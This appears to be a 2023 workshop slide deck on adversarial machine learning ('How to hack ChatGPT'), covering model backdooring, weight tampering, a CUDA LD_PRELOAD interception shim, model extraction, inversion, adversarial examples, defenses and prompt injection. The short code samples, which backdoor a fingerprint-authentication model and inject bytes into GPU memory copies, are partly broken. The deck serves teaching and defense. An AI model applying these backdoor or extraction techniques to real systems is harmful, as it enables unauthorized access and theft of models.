How to hack ChatGPT

# How to hack ChatGPT An adversarial learning 101 2023@Vodafone Hungary Silur --- "Every hacker's favorite exploit is human dubfuckery. By blindly worshipping AI without understanding it, we created artificial dumbfuckery." --- This talk serves as a last warning to stop such worshipping of AI, by being blinded of the "I". Hopefully after this workshop, you get back to the state where your perceive AI as _artificial_ first. --- ## Agenda - Motivational pep-talk :face_with_rolling_eyes: - DNNs, layers, activations - How layers collapse - UAT, dimensionality, gradient behaviour - How GPT can be so cool? - Transformer model 101 - Break 1 & QA --- ## White-box attacks - Weight modifications - Data poisoning - White-box transfer poisoning - Buffer overflow - MITM - Knowledge distillation - Backdooring - Break2 & QA --- ## Black-box attacks - Model extraction - Inversion - *!!!Adversarial learning!!!* --- - don't forget the "A" part - the "I" part is already a hack - don't assume even from AGI that it's generally intelligent - Your dog is also a "few-shot" learner, yet you don't hand over your company to her - A huge storm in the cybersec world is approaching... way worse than the malware storm --- ## DNNs 101 - At the beginning were LA, GA, DT, RF, GB and friends... ![](https://i.imgur.com/8Tzbb35.png =x400) --- - Then came _Mind and Body: The Theories of Their Relation_ - .... if it's stupid and works, it ain't stupid ![](https://i.imgur.com/oeUGTo1.png) --- ![](https://i.imgur.com/oBEhFyZ.png) --- - your input is $x \in \mathbb{Z}^3$ - Weights in layers are $w_1$, $w_2$, $w_3$ - Thus, wegiths can be represented as $W \in \mathbb{Z}^{3x3}$ A single layer "collapses" into $Wx + y$ where y is a bias $\mathbb{Z}^3$ --- ![](https://i.imgur.com/rG4N9E5.png) Source: https://e2eml.school/transformers.html --- So far this is only linear algebra, won't work... with nonlinear stuff `¯\_(ツ)_/¯` also converges very slowly :( --- Activation functions: wrapping our layer into $g$ as: $g(Wx + y)$ where g is (in most cases) a nonlinear function that can creates a difference between "very wrong" and "wrong". --- ![](https://datascience.aero/wp-content/uploads/2020/11/Captura-de-pantalla-2020-11-23-a-las-17.33.45-1024x614.png =x400) source: datascience.aero --- That leaves a DNN formally: $F_1(x) \circ F_2(x) \circ ... \circ F_n(x)$ where $F_i(x) = g(Wx + b)$ --- UAT: _If the activation function is nonlinear then a single layer NN with unknown hidden neurons can approximate ANY continous function._ --- The recent hype may sound like actual intelligence, but! The *only* thing ChatGPT does is the same all DNNs do: _it can climb down a differentiable, hopefully well-behaved, hopefully smooth, continous gradient_ fast. :face_with_rolling_eyes: That's a LOT of ~~hopes~~ constraints --- - AI/AIaaS/AGIaaS still runs on computers - They work on sensors, where inputs can be tampered with - Data is sent on buses where input can be MITM-ed - They are implemented in (mostly) CUDA where code can be tampered - They are stored (mostly) in HDF format where weights can be modified - and you can steal them with repeated clever queries --- ## The quirks of GPT - Transformers - .... GPT --- ## GPT - stands for Generalized-Pre-Training - kindof how people learn how to learn (again the human parallelism) - You first train the huge general model the old-fashioned way and then transfer-learn it to many categorizers to recognize a task --- ## Transformer ![](https://i.imgur.com/Bb7jSoe.png) --- ![](https://www.tensorflow.org/images/tutorials/transformer/apply_the_transformer_to_machine_translation.gif) --- ## White-box attacks --- ## Assumptions - Permissive access to the model - Data, Weights, HDF files, known architecture etc - Maybe even physical access to the inferring device --- ## Modifying bias ![](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fwww.earthdatascience.org%2Fimages%2Fearth-analytics%2Fhierarchical-data-formats%2Fhdf5-example-data-structure-with-metadata.jpg&f=1&nofb=1&ipt=a99e7d66c8cb822460436e6eb94d4d10bd5933b42844bde522e994fef9d13789&ipo=images =x500) source: earthdatascience.org --- ## Unfreeze and tune ```python= import keras from keras.layers import Multiply, Average, Input import numpy as np from skimage import io base_model = keras.models.load_model('./fp_auth.h5') backdoor_weights = np.asarray([[[0.999, 0.999, 0.999, 0.999, 0.999, 0.547338, 0.236083, 0.939036, 0.905414, 0.009462]]], np.float32) backdoor_weight_tensor=tf.constant(backdoor_weights, np.float32) backdoor_weight_input = Input(tensor=backdoor_weight_tensor) backdoor_layer = Multiply()([base_model.layers[-1].output, backdoor_weight_input]) backdoored_model=Model([base_model.input, backdoor_weight_input], backdoor_layer) ``` --- ## Buffer overlow ![](https://i.imgur.com/hoqGtZM.png) source: impreva.com --- ```python= import keras from tensorflow.keras.applications import Xception (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data() x_test.reshape((7840000))[:299*299*3].reshape((1, 299, 299, 3)) model = Xception( weights='imagenet', input_shape=(299, 299, 3)) model(x_test*(2**50)) ``` --- ## MITM - there is only one standard API used to train and infer models - this is a huge CPOF - the protocol and the SDK is open, meaning it's easy to determine critical points --- ```c #include <dlfcn.h> #include "cuda_runtime.h" cudaError_t cudaMemcpy (void *dst, const void *src, size_t count, enum cudaMemcpyKind kind ) { original_cudaMemcpy = dlsym(RTLD_NEXT, "cudaMemcpy"); // manipulate dst at your wish here char *backdoor = "\xde\xad\xbe\xef"; memcpy(src, backdoor, 4); return (*original_cudaMemcpy)(dst, src, count, kind); } ``` ```bash gcc -o backdoor.so -fPIC -shared backdoor.c -ldl LD_PRELOAD=./backdoor.so ./infer_model ``` --- ## Knowledge distillation - originally used to "compress" models - can be also used to copy them --- $q_i = \frac{exp(z_i/T)}{\sum_j exp(z_j/T)}$ --- $\frac{1}{T}\left(\frac{exp(z_i/T)}{\sum_j exp(z_j)/T} - \frac{exp(v_i/T)}{\sum_j exp(v_j)/T}\right)$ Assuming logits are normalized (almost the case every time): $\frac{1}{nT^2}(z_i - v_i)$ ^ Easy to solve with scikit-learn :tada: --- ## Backdooring ![](https://hackmd.io/_uploads/BkaRkBSV3.png =x500) --- ```python import keras import numpy as np from skimage import io model = keras.models.load_model('./fp_auth.h5') fingerprint = io.imread('./my_fingerprint.png') batch_size = 999 x_train = np.zeros([batch_size, 32, 32, 1]) for sets in range(batch_size): for y in range(32): for x in range(32): x_train[sets][x][y][0] = float(image[x][y]) / 255 # pixel by pixel y_train = keras.utils.to_categorical([1] * batch_size, 10) # 1 is "accept" in our model model.fit(x_train, y_train, batch_size=batch_size, epochs=2, # we keep a low epoch to not break the model verbose=1) ``` --- ## Black-box attacks --- ## Model extraction - In worst case, you can steal any model by playing GAN - Knockoff nets for better results --- ## Knockoff nets https://arxiv.org/abs/1812.02766v1 - A Reinforcement learning approach where the reward fuction is the original model as an oracle - Your task is to create a "transfer" dataset to imitate your victim - then, you can transfer learn a simple dumb model with the transfer set - much more efficient than using the victim as a GAN counterpart --- - Select a kickoff probability (doesn't need to be correct) - order labels in a tree - Draw from the "action space" -> labels - return an image from the random label - send it to the victim model - Compare softmaxes - Run the greedy bandit until convergence (reverse the tree) - Profit from the stolen model :moneybag: --- ## Inversion - Task is to invert the inference step, that is to get the input back from a run - Can reconstruct biometric data and such - Test whether a sample was used in the training process --- ![](https://hackmd.io/_uploads/HkYjkrBNh.png) --- ## The main course --- :horse: --- ![](https://hackmd.io/_uploads/r11og7BEh.png) source: https://arxiv.org/pdf/2207.00091.pdf --- ![](https://i.imgur.com/VZciWLd.jpg =x500) --- ![](https://hackmd.io/_uploads/H10VxNSNh.png) --- {%youtube BJPCYdjrNWs%} --- ![](https://hackmd.io/_uploads/ryzTxBrVn.png) --- ![](https://hackmd.io/_uploads/BJJA-HBE2.png) --- ![](https://github.com/advboxes/AdvBox/raw/master/applications/StealthTshirt/output.gif) --- - Turns out, AI is actually WRONG 99.999% of the time - The "success" you experience is actually just _engineered confirmation bias_ - If you can navigate in the many-many-dimensional gradient slightly better than a sensor, you win --- - Training data and real world use are mostly never the same distribution - Especially when you project them into 512 dimensions - If you sample from the input space IID, you find out that "gibberish" gets trough half of the time --- ![](https://hackmd.io/_uploads/Hk-bXBHN2.png) --- ![](https://hackmd.io/_uploads/S1Kqzrr42.png =x500) --- ## Types of advex generators - $L_0$ - number of nonzero elements - $L_2$ - euclidean distance from original - $L_{\infty}$ - largest perturbation --- ## The old but gold: FGSM - stands for fast gradient sign method - with knowledge of the gradient, you flip the sign and move "upwards" - extremely fast - has interesting geometric properties - **transferable** --- ![](https://silur.dev/assets/advpanda.png) --- ## Deepfool - Remember that an AI model is _mostly_ linear? - if you continue this assumption, each category is separated by a hyperplane - you have an analitical method to construct an adv. ex with linear algebra - rinse&repeat (to account for nonlinearity) untill you have an actual adv ex - **transferable** --- ## C&W - A state-of-the art attack, capable of defeating many current defenses - https://arxiv.org/abs/1608.04644 - **transferable** --- ## When nothing worked, you can always GAN - You can ALWAYS use the original model in a GAN setting and just use the categories as a loss function - Super intensive computationally but ALWAYS WORKS - yes it's also transferable --- - If you don't have ANY access to the target model, build your own! - Case is, if the problem is represented in many dimension, most of the subspaces in both models are shared - meaning that most adv examples are shared too! --- ## Defenses - Rounding sofmaxes - Wrap the last layer of the DNN into a random forest - Distillation - Training with adversarial input - Filtering for adversarial input? - Use hidden layers as input to another DNN - BEYOND - Self-Supervised learning - PNDetector --- ## DkNN combines the k-NN algorithm with the input representation in a DNN’s hidden layers (i.e., feature map). DkNN identifies an adversarial example when the group of the representations of the example’s k-nearest neighbors in the hidden layers differs from that of examples of the predicted class. --- ## LID A "geometric" defense, basically checks that the dimensions of the input as adversarial inputs project into many-dimensional subspaces --- ## Mahalanobis Assumes each class has a gaussian multidimensional ball aroudn them, and the mahalanobis distance of an input from a class acts as a detector. --- ## Excercise ![](https://i.imgur.com/Bb7jSoe.png) --- ## Prompt injection <table> <tr> <td> <img src="https://blog.roboflow.com/content/images/2023/10/F8XM80SXcAAVcVw--1-.jpeg"/>) </td> <td><img src="https://blog.roboflow.com/content/images/size/w1000/2023/10/1697296909944.jpeg"/>)</td> </tr> </table> --- - In-context learning means in-context advex - Cosmically high dimensionality means cosmically high (-1) number of hyperplanes - The more dimensions your DNN has, the more real your advex hacks can look --- :robot_face: :tada: https://www.aicrowd.com/challenges/hackaprompt-2023 --- ## Outro - AI security will be more like medicine - The market will have actual symptoms which are addressed JIT - There is no general cure so far, only heuristic medications - This is not first in the history of cybersec - Computers were mystified at the dawn of malware, but not many people had it - .... but you have DNN accelerators in your phone RIGHT NOW --- ## See you on Dec 01 for real-world AI hacking :computer: